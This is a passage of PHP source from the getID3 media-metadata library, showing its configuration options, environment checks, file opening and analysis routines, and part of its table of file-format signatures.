just returned parsed metadata * * @var bool */ public $options_audiovideo_quicktime_ParseAllPossibleAtoms = false; /** audio-video.swf * return all parsed tags if true, otherwise do not return tags not parsed by getID3 * * @var bool */ public $options_audiovideo_swf_ReturnAllTagData = false; /** graphic.bmp * return BMP palette * * @var bool */ public $options_graphic_bmp_ExtractPalette = false; /** graphic.bmp * return image data * * @var bool */ public $options_graphic_bmp_ExtractData = false; /** graphic.png * If data chunk is larger than this do not read it completely (getID3 only needs the first * few dozen bytes for parsing). * * @var int */ public $options_graphic_png_max_data_bytes = 10000000; /** misc.pdf * return full details of PDF Cross-Reference Table (XREF) * * @var bool */ public $options_misc_pdf_returnXREF = false; /** misc.torrent * Assume all .torrent files are less than 1MB and just read entire thing into memory for easy processing. * Override this value if you need to process files larger than 1MB * * @var int */ public $options_misc_torrent_max_torrent_filesize = 1048576; // Public variables /** * Filename of file being analysed. * * @var string */ public $filename; /** * Filepointer to file being analysed. * * @var resource */ public $fp; /** * Result array. * * @var array */ public $info; /** * @var string */ public $tempdir = GETID3_TEMP_DIR; /** * @var int */ public $memory_limit = 0; /** * @var string */ protected $startup_error = ''; /** * @var string */ protected $startup_warning = ''; const VERSION = '1.9.23-202310190849'; const FREAD_BUFFER_SIZE = 32768; const ATTACHMENTS_NONE = false; const ATTACHMENTS_INLINE = true; /** * @throws getid3_exception */ public function __construct() { // Check for PHP version $required_php_version = '5.3.0'; if (version_compare(PHP_VERSION, $required_php_version, '<')) { $this->startup_error .= 'getID3() requires PHP v'.$required_php_version.' or higher - you are running v'.PHP_VERSION."\n"; return; } // Check memory $memoryLimit = ini_get('memory_limit'); if (preg_match('#([0-9]+) ?M#i', $memoryLimit, $matches)) { // could be stored as "16M" rather than 16777216 for example $memoryLimit = $matches[1] * 1048576; } elseif (preg_match('#([0-9]+) ?G#i', $memoryLimit, $matches)) { // The 'G' modifier is available since PHP 5.1.0 // could be stored as "2G" rather than 2147483648 for example $memoryLimit = $matches[1] * 1073741824; } $this->memory_limit = $memoryLimit; if ($this->memory_limit <= 0) { // memory limits probably disabled } elseif ($this->memory_limit <= 4194304) { $this->startup_error .= 'PHP has less than 4MB available memory and will very likely run out. Increase memory_limit in php.ini'."\n"; } elseif ($this->memory_limit <= 12582912) { $this->startup_warning .= 'PHP has less than 12MB available memory and might run out if all modules are loaded. Increase memory_limit in php.ini'."\n"; } // Check safe_mode off if (preg_match('#(1|ON)#i', ini_get('safe_mode'))) { // phpcs:ignore PHPCompatibility.IniDirectives.RemovedIniDirectives.safe_modeDeprecatedRemoved $this->warning('WARNING: Safe mode is on, shorten support disabled, md5data/sha1data for ogg vorbis disabled, ogg vorbos/flac tag writing disabled.'); } // phpcs:ignore PHPCompatibility.IniDirectives.RemovedIniDirectives.mbstring_func_overloadDeprecated if (($mbstring_func_overload = (int) ini_get('mbstring.func_overload')) && ($mbstring_func_overload & 0x02)) { // http://php.net/manual/en/mbstring.overload.php // "mbstring.func_overload in php.ini is a positive value that represents a combination of bitmasks specifying the categories of functions to be overloaded. It should be set to 1 to overload the mail() function. 2 for string functions, 4 for regular expression functions" // getID3 cannot run when string functions are overloaded. It doesn't matter if mail() or ereg* functions are overloaded since getID3 does not use those. // phpcs:ignore PHPCompatibility.IniDirectives.RemovedIniDirectives.mbstring_func_overloadDeprecated $this->startup_error .= 'WARNING: php.ini contains "mbstring.func_overload = '.ini_get('mbstring.func_overload').'", getID3 cannot run with this setting (bitmask 2 (string functions) cannot be set). Recommended to disable entirely.'."\n"; } // check for magic quotes in PHP < 5.4.0 (when these options were removed and getters always return false) if (version_compare(PHP_VERSION, '5.4.0', '<')) { // Check for magic_quotes_runtime if (function_exists('get_magic_quotes_runtime')) { // phpcs:ignore PHPCompatibility.FunctionUse.RemovedFunctions.get_magic_quotes_runtimeDeprecated if (get_magic_quotes_runtime()) { // @phpstan-ignore-line $this->startup_error .= 'magic_quotes_runtime must be disabled before running getID3(). Surround getid3 block by set_magic_quotes_runtime(0) and set_magic_quotes_runtime(1).'."\n"; } } // Check for magic_quotes_gpc if (function_exists('get_magic_quotes_gpc')) { // phpcs:ignore PHPCompatibility.FunctionUse.RemovedFunctions.get_magic_quotes_gpcDeprecated if (get_magic_quotes_gpc()) { // @phpstan-ignore-line $this->startup_error .= 'magic_quotes_gpc must be disabled before running getID3(). Surround getid3 block by set_magic_quotes_gpc(0) and set_magic_quotes_gpc(1).'."\n"; } } } // Load support library if (!include_once(GETID3_INCLUDEPATH.'getid3.lib.php')) { $this->startup_error .= 'getid3.lib.php is missing or corrupt'."\n"; } if ($this->option_max_2gb_check === null) { $this->option_max_2gb_check = (PHP_INT_MAX <= 2147483647); } // Needed for Windows only: // Define locations of helper applications for Shorten, VorbisComment, MetaFLAC // as well as other helper functions such as head, etc // This path cannot contain spaces, but the below code will attempt to get the // 8.3-equivalent path automatically // IMPORTANT: This path must include the trailing slash if (GETID3_OS_ISWINDOWS && !defined('GETID3_HELPERAPPSDIR')) { $helperappsdir = GETID3_INCLUDEPATH.'..'.DIRECTORY_SEPARATOR.'helperapps'; // must not have any space in this path if (!is_dir($helperappsdir)) { $this->startup_warning .= '"'.$helperappsdir.'" cannot be defined as GETID3_HELPERAPPSDIR because it does not exist'."\n"; } elseif (strpos(realpath($helperappsdir), ' ') !== false) { $DirPieces = explode(DIRECTORY_SEPARATOR, realpath($helperappsdir)); $path_so_far = array(); foreach ($DirPieces as $key => $value) { if (strpos($value, ' ') !== false) { if (!empty($path_so_far)) { $commandline = 'dir /x '.escapeshellarg(implode(DIRECTORY_SEPARATOR, $path_so_far)); $dir_listing = `$commandline`; $lines = explode("\n", $dir_listing); foreach ($lines as $line) { $line = trim($line); if (preg_match('#^([0-9/]{10}) +([0-9:]{4,5}( [AP]M)?) +(<DIR>|[0-9,]+) +([^ ]{0,11}) +(.+)$#', $line, $matches)) { list($dummy, $date, $time, $ampm, $filesize, $shortname, $filename) = $matches; if ((strtoupper($filesize) == '<DIR>') && (strtolower($filename) == strtolower($value))) { $value = $shortname; } } } } else { $this->startup_warning .= 'GETID3_HELPERAPPSDIR must not have any spaces in it - use 8dot3 naming convention if neccesary. You can run "dir /x" from the commandline to see the correct 8.3-style names.'."\n"; } } $path_so_far[] = $value; } $helperappsdir = implode(DIRECTORY_SEPARATOR, $path_so_far); } define('GETID3_HELPERAPPSDIR', $helperappsdir.DIRECTORY_SEPARATOR); } if (!empty($this->startup_error)) { echo $this->startup_error; throw new getid3_exception($this->startup_error); } } /** * @return string */ public function version() { return self::VERSION; } /** * @return int */ public function fread_buffer_size() { return $this->option_fread_buffer_size; } /** * @param array $optArray * * @return bool */ public function setOption($optArray) { if (!is_array($optArray) || empty($optArray)) { return false; } foreach ($optArray as $opt => $val) { if (isset($this->$opt) === false) { continue; } $this->$opt = $val; } return true; } /** * @param string $filename * @param int $filesize * @param resource $fp * * @return bool * * @throws getid3_exception */ public function openfile($filename, $filesize=null, $fp=null) { try { if (!empty($this->startup_error)) { throw new getid3_exception($this->startup_error); } if (!empty($this->startup_warning)) { foreach (explode("\n", $this->startup_warning) as $startup_warning) { $this->warning($startup_warning); } } // init result array and set parameters $this->filename = $filename; $this->info = array(); $this->info['GETID3_VERSION'] = $this->version(); $this->info['php_memory_limit'] = (($this->memory_limit > 0) ? $this->memory_limit : false); // remote files not supported if (preg_match('#^(ht|f)tps?://#', $filename)) { throw new getid3_exception('Remote files are not supported - please copy the file locally first'); } $filename = str_replace('/', DIRECTORY_SEPARATOR, $filename); //$filename = preg_replace('#(?<!gs:)('.preg_quote(DIRECTORY_SEPARATOR).'{2,})#', DIRECTORY_SEPARATOR, $filename); // open local file //if (is_readable($filename) && is_file($filename) && ($this->fp = fopen($filename, 'rb'))) { // see https://www.getid3.org/phpBB3/viewtopic.php?t=1720 if (($fp != null) && ((get_resource_type($fp) == 'file') || (get_resource_type($fp) == 'stream'))) { $this->fp = $fp; } elseif ((is_readable($filename) || file_exists($filename)) && is_file($filename) && ($this->fp = fopen($filename, 'rb'))) { // great } else { $errormessagelist = array(); if (!is_readable($filename)) { $errormessagelist[] = '!is_readable'; } if (!is_file($filename)) { $errormessagelist[] = '!is_file'; } if (!file_exists($filename)) { $errormessagelist[] = '!file_exists'; } if (empty($errormessagelist)) { $errormessagelist[] = 'fopen failed'; } throw new getid3_exception('Could not open "'.$filename.'" ('.implode('; ', $errormessagelist).')'); } $this->info['filesize'] = (!is_null($filesize) ? $filesize : filesize($filename)); // set redundant parameters - might be needed in some include file // filenames / filepaths in getID3 are always expressed with forward slashes (unix-style) for both Windows and other to try and minimize confusion $filename = str_replace('\\', '/', $filename); $this->info['filepath'] = str_replace('\\', '/', realpath(dirname($filename))); $this->info['filename'] = getid3_lib::mb_basename($filename); $this->info['filenamepath'] = $this->info['filepath'].'/'.$this->info['filename']; // set more parameters $this->info['avdataoffset'] = 0; $this->info['avdataend'] = $this->info['filesize']; $this->info['fileformat'] = ''; // filled in later $this->info['audio']['dataformat'] = ''; // filled in later, unset if not used $this->info['video']['dataformat'] = ''; // filled in later, unset if not used $this->info['tags'] = array(); // filled in later, unset if not used $this->info['error'] = array(); // filled in later, unset if not used $this->info['warning'] = array(); // filled in later, unset if not used $this->info['comments'] = array(); // filled in later, unset if not used $this->info['encoding'] = $this->encoding; // required by id3v2 and iso modules - can be unset at the end if desired // option_max_2gb_check if ($this->option_max_2gb_check) { // PHP (32-bit all, and 64-bit Windows) doesn't support integers larger than 2^31 (~2GB) // filesize() simply returns (filesize % (pow(2, 32)), no matter the actual filesize // ftell() returns 0 if seeking to the end is beyond the range of unsigned integer $fseek = fseek($this->fp, 0, SEEK_END); if (($fseek < 0) || (($this->info['filesize'] != 0) && (ftell($this->fp) == 0)) || ($this->info['filesize'] < 0) || (ftell($this->fp) < 0)) { $real_filesize = getid3_lib::getFileSizeSyscall($this->info['filenamepath']); if ($real_filesize === false) { unset($this->info['filesize']); fclose($this->fp); throw new getid3_exception('Unable to determine actual filesize. File is most likely larger than '.round(PHP_INT_MAX / 1073741824).'GB and is not supported by PHP.'); } elseif (getid3_lib::intValueSupported($real_filesize)) { unset($this->info['filesize']); fclose($this->fp); throw new getid3_exception('PHP seems to think the file is larger than '.round(PHP_INT_MAX / 1073741824).'GB, but filesystem reports it as '.number_format($real_filesize / 1073741824, 3).'GB, please report to info@getid3.org'); } $this->info['filesize'] = $real_filesize; $this->warning('File is larger than '.round(PHP_INT_MAX / 1073741824).'GB (filesystem reports it as '.number_format($real_filesize / 1073741824, 3).'GB) and is not properly supported by PHP.'); } } return true; } catch (Exception $e) { $this->error($e->getMessage()); } return false; } /** * analyze file * * @param string $filename * @param int $filesize * @param string $original_filename * @param resource $fp * * @return array */ public function analyze($filename, $filesize=null, $original_filename='', $fp=null) { try { if (!$this->openfile($filename, $filesize, $fp)) { return $this->info; } // Handle tags foreach (array('id3v2'=>'id3v2', 'id3v1'=>'id3v1', 'apetag'=>'ape', 'lyrics3'=>'lyrics3') as $tag_name => $tag_key) { $option_tag = 'option_tag_'.$tag_name; if ($this->$option_tag) { $this->include_module('tag.'.$tag_name); try { $tag_class = 'getid3_'.$tag_name; $tag = new $tag_class($this); $tag->Analyze(); } catch (getid3_exception $e) { throw $e; } } } if (isset($this->info['id3v2']['tag_offset_start'])) { $this->info['avdataoffset'] = max($this->info['avdataoffset'], $this->info['id3v2']['tag_offset_end']); } foreach (array('id3v1'=>'id3v1', 'apetag'=>'ape', 'lyrics3'=>'lyrics3') as $tag_name => $tag_key) { if (isset($this->info[$tag_key]['tag_offset_start'])) { $this->info['avdataend'] = min($this->info['avdataend'], $this->info[$tag_key]['tag_offset_start']); } } // ID3v2 detection (NOT parsing), even if ($this->option_tag_id3v2 == false) done to make fileformat easier if (!$this->option_tag_id3v2) { fseek($this->fp, 0); $header = fread($this->fp, 10); if ((substr($header, 0, 3) == 'ID3') && (strlen($header) == 10)) { $this->info['id3v2']['header'] = true; $this->info['id3v2']['majorversion'] = ord($header[3]); $this->info['id3v2']['minorversion'] = ord($header[4]); $this->info['avdataoffset'] += getid3_lib::BigEndian2Int(substr($header, 6, 4), 1) + 10; // length of ID3v2 tag in 10-byte header doesn't include 10-byte header length } } // read 32 kb file data fseek($this->fp, $this->info['avdataoffset']); $formattest = fread($this->fp, 32774); // determine format $determined_format = $this->GetFileFormat($formattest, ($original_filename ? $original_filename : $filename)); // unable to determine file format if (!$determined_format) { fclose($this->fp); return $this->error('unable to determine file format'); } // check for illegal ID3 tags if (isset($determined_format['fail_id3']) && (in_array('id3v1', $this->info['tags']) || in_array('id3v2', $this->info['tags']))) { if ($determined_format['fail_id3'] === 'ERROR') { fclose($this->fp); return $this->error('ID3 tags not allowed on this file type.'); } elseif ($determined_format['fail_id3'] === 'WARNING') { $this->warning('ID3 tags not allowed on this file type.'); } } // check for illegal APE tags if (isset($determined_format['fail_ape']) && in_array('ape', $this->info['tags'])) { if ($determined_format['fail_ape'] === 'ERROR') { fclose($this->fp); return $this->error('APE tags not allowed on this file type.'); } elseif ($determined_format['fail_ape'] === 'WARNING') { $this->warning('APE tags not allowed on this file type.'); } } // set mime type $this->info['mime_type'] = $determined_format['mime_type']; // supported format signature pattern detected, but module deleted if (!file_exists(GETID3_INCLUDEPATH.$determined_format['include'])) { fclose($this->fp); return $this->error('Format not supported, module "'.$determined_format['include'].'" was removed.'); } // module requires mb_convert_encoding/iconv support // Check encoding/iconv support if (!empty($determined_format['iconv_req']) && !function_exists('mb_convert_encoding') && !function_exists('iconv') && !in_array($this->encoding, array('ISO-8859-1', 'UTF-8', 'UTF-16LE', 'UTF-16BE', 'UTF-16'))) { $errormessage = 'mb_convert_encoding() or iconv() support is required for this module ('.$determined_format['include'].') for encodings other than ISO-8859-1, UTF-8, UTF-16LE, UTF16-BE, UTF-16. '; if (GETID3_OS_ISWINDOWS) { $errormessage .= 'PHP does not have mb_convert_encoding() or iconv() support. Please enable php_mbstring.dll / php_iconv.dll in php.ini, and copy php_mbstring.dll / iconv.dll from c:/php/dlls to c:/windows/system32'; } else { $errormessage .= 'PHP is not compiled with mb_convert_encoding() or iconv() support. Please recompile with the --enable-mbstring / --with-iconv switch'; } return $this->error($errormessage); } // include module include_once(GETID3_INCLUDEPATH.$determined_format['include']); // instantiate module class $class_name = 'getid3_'.$determined_format['module']; if (!class_exists($class_name)) { return $this->error('Format not supported, module "'.$determined_format['include'].'" is corrupt.'); } $class = new $class_name($this); // set module-specific options foreach (get_object_vars($this) as $getid3_object_vars_key => $getid3_object_vars_value) { if (preg_match('#^options_([^_]+)_([^_]+)_(.+)$#i', $getid3_object_vars_key, $matches)) { list($dummy, $GOVgroup, $GOVmodule, $GOVsetting) = $matches; $GOVgroup = (($GOVgroup == 'audiovideo') ? 'audio-video' : $GOVgroup); // variable names can only contain 0-9a-z_ so standardize here if (($GOVgroup == $determined_format['group']) && ($GOVmodule == $determined_format['module'])) { $class->$GOVsetting = $getid3_object_vars_value; } } } $class->Analyze(); unset($class); // close file fclose($this->fp); // process all tags - copy to 'tags' and convert charsets if ($this->option_tags_process) { $this->HandleAllTags(); } // perform more calculations if ($this->option_extra_info) { $this->ChannelsBitratePlaytimeCalculations(); $this->CalculateCompressionRatioVideo(); $this->CalculateCompressionRatioAudio(); $this->CalculateReplayGain(); $this->ProcessAudioStreams(); } // get the MD5 sum of the audio/video portion of the file - without ID3/APE/Lyrics3/etc header/footer tags if ($this->option_md5_data) { // do not calc md5_data if md5_data_source is present - set by flac only - future MPC/SV8 too if (!$this->option_md5_data_source || empty($this->info['md5_data_source'])) { $this->getHashdata('md5'); } } // get the SHA1 sum of the audio/video portion of the file - without ID3/APE/Lyrics3/etc header/footer tags if ($this->option_sha1_data) { $this->getHashdata('sha1'); } // remove undesired keys $this->CleanUp(); } catch (Exception $e) { $this->error('Caught exception: '.$e->getMessage()); } // return info array return $this->info; } /** * Error handling. * * @param string $message * * @return array */ public function error($message) { $this->CleanUp(); if (!isset($this->info['error'])) { $this->info['error'] = array(); } $this->info['error'][] = $message; return $this->info; } /** * Warning handling. * * @param string $message * * @return bool */ public function warning($message) { $this->info['warning'][] = $message; return true; } /** * @return bool */ private function CleanUp() { // remove possible empty keys $AVpossibleEmptyKeys = array('dataformat', 'bits_per_sample', 'encoder_options', 'streams', 'bitrate'); foreach ($AVpossibleEmptyKeys as $dummy => $key) { if (empty($this->info['audio'][$key]) && isset($this->info['audio'][$key])) { unset($this->info['audio'][$key]); } if (empty($this->info['video'][$key]) && isset($this->info['video'][$key])) { unset($this->info['video'][$key]); } } // remove empty root keys if (!empty($this->info)) { foreach ($this->info as $key => $value) { if (empty($this->info[$key]) && ($this->info[$key] !== 0) && ($this->info[$key] !== '0')) { unset($this->info[$key]); } } } // remove meaningless entries from unknown-format files if (empty($this->info['fileformat'])) { if (isset($this->info['avdataoffset'])) { unset($this->info['avdataoffset']); } if (isset($this->info['avdataend'])) { unset($this->info['avdataend']); } } // remove possible duplicated identical entries if (!empty($this->info['error'])) { $this->info['error'] = array_values(array_unique($this->info['error'])); } if (!empty($this->info['warning'])) { $this->info['warning'] = array_values(array_unique($this->info['warning'])); } // remove "global variable" type keys unset($this->info['php_memory_limit']); return true; } /** * Return array containing information about all supported formats. * * @return array */ public function GetFileFormatArray() { static $format_info = array(); if (empty($format_info)) { $format_info = array( // Audio formats // AC-3 - audio - Dolby AC-3 / Dolby Digital 'ac3' => array( 'pattern' => '^\\x0B\\x77', 'group' => 'audio', 'module' => 'ac3', 'mime_type' => 'audio/ac3', ), // AAC - audio - Advanced Audio Coding (AAC) - ADIF format 'adif' => array( 'pattern' => '^ADIF', 'group' => 'audio', 'module' => 'aac', 'mime_type' => 'audio/aac', 'fail_ape' => 'WARNING', ), /* // AA - audio - Audible Audiobook 'aa' => array( 'pattern' => '^.{4}\\x57\\x90\\x75\\x36', 'group' => 'audio', 'module' => 'aa', 'mime_type' => 'audio/audible', ), */ // AAC - audio - Advanced Audio Coding (AAC) - ADTS format (very similar to MP3) 'adts' => array( 'pattern' => '^\\xFF[\\xF0-\\xF1\\xF8-\\xF9]', 'group' => 'audio', 'module' => 'aac', 'mime_type' => 'audio/aac', 'fail_ape' => 'WARNING', ), // AU - audio - NeXT/Sun AUdio (AU) 'au' => array( 'pattern' => '^\\.snd', 'group' => 'audio', 'module' => 'au', 'mime_type' => 'audio/basic', ), // AMR - audio - Adaptive Multi Rate 'amr' => array( 'pattern' => '^\\x23\\x21AMR\\x0A', // #!AMR[0A] 'group' => 'audio', 'module' => 'amr', 'mime_type' => 'audio/amr', ), // AVR - audio - Audio Visual Research 'avr' => array( 'pattern' => '^2BIT', 'group' => 'audio', 'module' => 'avr', 'mime_type' => 'application/octet-stream', ), // BONK - audio - Bonk v0.9+ 'bonk' => array( 'pattern' => '^\\x00(BONK|INFO|META| ID3)', 'group' => 'audio', 'module' => 'bonk', 'mime_type' => 'audio/xmms-bonk', ), // DSF - audio - Direct Stream Digital (DSD) Storage Facility files (DSF) - https://en.wikipedia.org/wiki/Direct_Stream_Digital 'dsf' => array( 'pattern' => '^DSD ', // including trailing space: 44 53 44 20 'group' => 'audio', 'module' => 'dsf', 'mime_type' => 'audio/dsd', ), // DSS - audio - Digital Speech Standard 'dss' => array( 'pattern' => '^[\\x02-\\x08]ds[s2]', 'group' => 'audio', 'module' => 'dss', 'mime_type' => 'application/octet-stream', ), // DSDIFF - audio - Direct Stream Digital Interchange File Format 'dsdiff' => array( 'pattern' => '^FRM8', 'group' => 'audio', 'module' => 'dsdiff', 'mime_type' => 'audio/dsd', ), // DTS - audio - Dolby Theatre System 'dts' => array( 'pattern' => '^\\x7F\\xFE\\x80\\x01', 'group' => 'audio', 'module' => 'dts', 'mime_type' => 'audio/dts', ), // FLAC - audio - Free Lossless Audio Codec 'flac' => array( 'pattern' => '^fLaC', 'group' => 'audio', 'module' => 'flac', 'mime_type' => 'audio/flac', ), // LA - audio - Lossless Audio (LA) 'la' => array( 'pattern' => '^LA0[2-4]', 'group' => 'audio', 'module' => 'la', 'mime_type' => 'application/octet-stream', ), // LPAC - audio - Lossless Predictive Audio Compression (LPAC) 'lpac' => array( 'pattern' => '^LPAC', 'group' => 'audio', 'module' => 'lpac', 'mime_type' => 'application/octet-stream', ), // MIDI - audio - MIDI (Musical Instrument Digital Interface) 'midi' => array( 'pattern' => '^MThd', 'group' => 'audio', 'module' => 'midi', 'mime_type' => 'audio/midi', ), // MAC - audio - Monkey's Audio Compressor 'mac' => array( 'pattern' => '^MAC ', 'group' => 'audio', 'module' => 'monkey', 'mime_type' => 'audio/x-monkeys-audio', ), // MOD - audio - MODule (SoundTracker) 'mod' => array( //'pattern' => '^.{1080}(M\\.K\\.|M!K!|FLT4|FLT8|[5-9]CHN|[1-3][0-9]CH)', // has been known to produce false matches in random files (e.g. JPEGs), leave out until more precise matching available 'pattern' => '^.{1080}(M\\.K\\.)', 'group' => 'audio', 'module' => 'mod', 'option' => 'mod', 'mime_type' => 'audio/mod', ), // MOD - audio - MODule (Impulse Tracker) 'it' => array( 'pattern' => '^IMPM', 'group' => 'audio', 'module' => 'mod', //'option' => 'it', 'mime_type' => 'audio/it', ), // MOD - audio - MODule (eXtended Module, various sub-formats) 'xm' => array( 'pattern' => '^Extended Module', 'group' => 'audio', 'module' => 'mod', //'option' => 'xm', 'mime_type' => 'audio/xm', ), // MOD - audio - MODule (ScreamTracker) 's3m' => array( 'pattern' => '^.{44}SCRM', 'group' => 'audio', 'module' => 'mod', //'option' => 's3m', 'mime_type' => 'audio/s3m', ), // MPC - audio - Musepack / MPEGplus 'mpc' => array( 'pattern' => '^(MPCK|MP\\+)', 'group' => 'audio', 'module' => 'mpc', 'mime_type' => 'audio/x-musepack', ), // MP3 - audio - MPEG-audio Layer 3 (very similar to AAC-ADTS) 'mp3' => array( 'pattern' => '^\\xFF[\\xE2-\\xE7\\xF2-\\xF7\\xFA-\\xFF][\\x00-\\x0B\\x10-\\x1B\\x20-\\x2B\\x30-\\x3B\\x40-\\x4B\\x50-\\x5B\\x60-\\x6B\\x70-\\x7B\\x80-\\x8B\\x90-\\x9B\\xA0-\\xAB\\xB0-\\xBB\\xC0-\\xCB\\xD0-\\xDB\\xE0-\\xEB\\xF0-\\xFB]', 'group' => 'audio', 'module' => 'mp3', 'mime_type' => 'audio/mpeg', ), // OFR - audio - OptimFROG 'ofr' => array( 'pattern' => '^(\\*RIFF|OFR)', 'group' => 'audio', 'module' => 'optimfrog', 'mime_type' => 'application/octet-stream', ), // RKAU - audio - RKive AUdio compressor 'rkau' => array( 'pattern' => '^RKA', 'group' => 'audio', 'module' => 'rkau', 'mime_type' => 'application/octet-stream', ), // SHN - audio - Shorten 'shn' => array( 'pattern' => '^ajkg', 'group' => 'audio', 'module' => 'shorten', 'mime_type' => 'audio/xmms-shn', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // TAK - audio - Tom's lossless Audio Kompressor 'tak' => array( 'pattern' => '^tBaK', 'group' => 'audio', 'module' => 'tak', 'mime_type' => 'application/octet-stream', ), // TTA - audio - TTA Lossless Audio Compressor (http://tta.corecodec.org) 'tta' => array( 'pattern' => '^TTA', // could also be '^TTA(\\x01|\\x02|\\x03|2|1)' 'group' => 'audio', 'module' => 'tta', 'mime_type' => 'application/octet-stream', ), // VOC - audio - Creative Voice (VOC) 'voc' => array( 'pattern' => '^Creative Voice File', 'group' => 'audio', 'module' => 'voc', 'mime_type' => 'audio/voc', ), // VQF - audio - transform-domain weighted interleave Vector Quantization Format (VQF) 'vqf' => array( 'pattern' => '^TWIN', 'group' => 'audio', 'module' => 'vqf', 'mime_type' => 'application/octet-stream', ), // WV - audio - WavPack (v4.0+) 'wv' => array( 'pattern' => '^wvpk', 'group' => 'audio', 'module' => 'wavpack', 'mime_type' => 'application/octet-stream', ), // Audio-Video formats // ASF - audio/video - Advanced Streaming Format, Windows Media Video, Windows Media Audio 'asf' => array( 'pattern' => '^\\x30\\x26\\xB2\\x75\\x8E\\x66\\xCF\\x11\\xA6\\xD9\\x00\\xAA\\x00\\x62\\xCE\\x6C', 'group' => 'audio-video', 'module' => 'asf', 'mime_type' => 'video/x-ms-asf', 'iconv_req' => false, ), // BINK - audio/video - Bink / Smacker 'bink' => array( 'pattern' => '^(BIK|SMK)', 'group' => 'audio-video', 'module' => 'bink', 'mime_type' => 'application/octet-stream', ), // FLV - audio/video - FLash Video 'flv' => array( 'pattern' => '^FLV[\\x01]', 'group' => 'audio-video', 'module' => 'flv', 'mime_type' => 'video/x-flv', ), // IVF - audio/video - IVF 'ivf' => array( 'pattern' => '^DKIF', 'group' => 'audio-video', 'module' => 'ivf', 'mime_type' => 'video/x-ivf', ), // MKAV - audio/video - Mastroka 'matroska' => array( 'pattern' => '^\\x1A\\x45\\xDF\\xA3', 'group' => 'audio-video', 'module' => 'matroska', 'mime_type' => 'video/x-matroska', // may also be audio/x-matroska ), // MPEG - audio/video - MPEG (Moving Pictures Experts Group) 'mpeg' => array( 'pattern' => '^\\x00\\x00\\x01[\\xB3\\xBA]', 'group' => 'audio-video', 'module' => 'mpeg', 'mime_type' => 'video/mpeg', ), // NSV - audio/video - Nullsoft Streaming Video (NSV) 'nsv' => array( 'pattern' => '^NSV[sf]', 'group' => 'audio-video', 'module' => 'nsv', 'mime_type' => 'application/octet-stream', ), // Ogg - audio/video - Ogg (Ogg-Vorbis, Ogg-FLAC, Speex, Ogg-Theora(*), Ogg-Tarkin(*)) 'ogg' => array( 'pattern' => '^OggS', 'group' => 'audio', 'module' => 'ogg', 'mime_type' => 'application/ogg', 'fail_id3' => 'WARNING', 'fail_ape' => 'WARNING', ), // QT - audio/video - Quicktime 'quicktime' => array( 'pattern' => '^.{4}(cmov|free|ftyp|mdat|moov|pnot|skip|wide)', 'group' => 'audio-video', 'module' => 'quicktime', 'mime_type' => 'video/quicktime', ), // RIFF - audio/video - Resource Interchange File Format (RIFF) / WAV / AVI / CD-audio / SDSS = renamed variant used by SmartSound QuickTracks (www.smartsound.com) / FORM = Audio Interchange File Format (AIFF) 'riff' => array( 'pattern' => '^(RIFF|SDSS|FORM)', 'group' => 'audio-video', 'module' => 'riff', 'mime_type' => 'audio/wav', 'fail_ape' => 'WARNING', ), // Real - audio/video - RealAudio, RealVideo 'real' => array( 'pattern' => '^\\.(RMF|ra)', 'group' => 'audio-video', 'module' => 'real', 'mime_type' => 'audio/x-realaudio', ), // SWF - audio/video - ShockWave Flash 'swf' => array( 'pattern' => '^(F|C)WS', 'group' => 'audio-video', 'module' => 'swf', 'mime_type' => 'application/x-shockwave-flash', ), // TS - audio/video - MPEG-2 Transport Stream 'ts' => array( 'pattern' => '^(\\x47.{187}){10,}', // packets are 188 bytes long and start with 0x47 "G". Check for at least 10 packets matching this pattern 'group' => 'audio-video', 'module' => 'ts', 'mime_type' => 'video/MP2T', ), // WTV - audio/video - Windows Recorded TV Show 'wtv' => array( 'pattern' => '^\\xB7\\xD8\\x00\\x20\\x37\\x49\\xDA\\x11\\xA6\\x4E\\x00\\x07\\xE9\\x5E\\xAD\\x8D', 'group' => 'audio-video', 'module' => 'wtv', 'mime_type' => 'video/x-ms-wtv', ), // Still-Image formats // BMP - still image - Bitmap (Windows, OS/2; uncompressed, RLE8, RLE4) 'bmp' => array( 'pattern' => '^BM', 'group' => 'graphic', 'module' => 'bmp', 'mime_type' => 'image/bmp', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // GIF - still image - Graphics Interchange Format 'gif' => array( 'pattern' => '^GIF', 'group' => 'graphic', 'module' => 'gif', 'mime_type' => 'image/gif', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // JPEG - still image - Joint Photographic Experts Group (JPEG) 'jpg' => array( 'pattern' => '^\\xFF\\xD8\\xFF', 'group' => 'graphic', 'module' => 'jpg', 'mime_type' => 'image/jpeg', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // PCD - still image - Kodak Photo CD 'pcd' => array( 'pattern' => '^.{2048}PCD_IPI\\x00', 'group' => 'graphic', 'module' => 'pcd', 'mime_type' => 'image/x-photo-cd', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // PNG - still image - Portable Network Graphics (PNG) 'png' => array( 'pattern' => '^\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A', 'group' => 'graphic', 'module' => 'png', 'mime_type' => 'image/png', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // SVG - still image - Scalable Vector Graphics (SVG) 'svg' => array( 'pattern' => '(<!DOCTYPE svg PUBLIC |xmlns="http://www\\.w3\\.org/2000/svg")', 'group' => 'graphic', 'module' => 'svg', 'mime_type' => 'image/svg+xml', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // TIFF - still image - Tagged Information File Format (TIFF) 'tiff' => array( 'pattern' => '^(II\\x2A\\x00|MM\\x00\\x2A)', 'group' => 'graphic', 'module' => 'tiff', 'mime_type' => 'image/tiff', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // EFAX - still image - eFax (TIFF derivative) 'efax' => array( 'pattern' => '^\\xDC\\xFE', 'group' => 'graphic', 'module' => 'efax', 'mime_type' => 'image/efax', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // Data formats // ISO - data - International Standards Organization (ISO) CD-ROM Image 'iso' => array( 'pattern' => '^.{32769}CD001', 'group' => 'misc', 'module' => 'iso', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', 'iconv_req' => false, ), // HPK - data - HPK compressed data 'hpk' => array( 'pattern' => '^BPUL', 'group' => 'archive', 'module' => 'hpk', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // RAR - 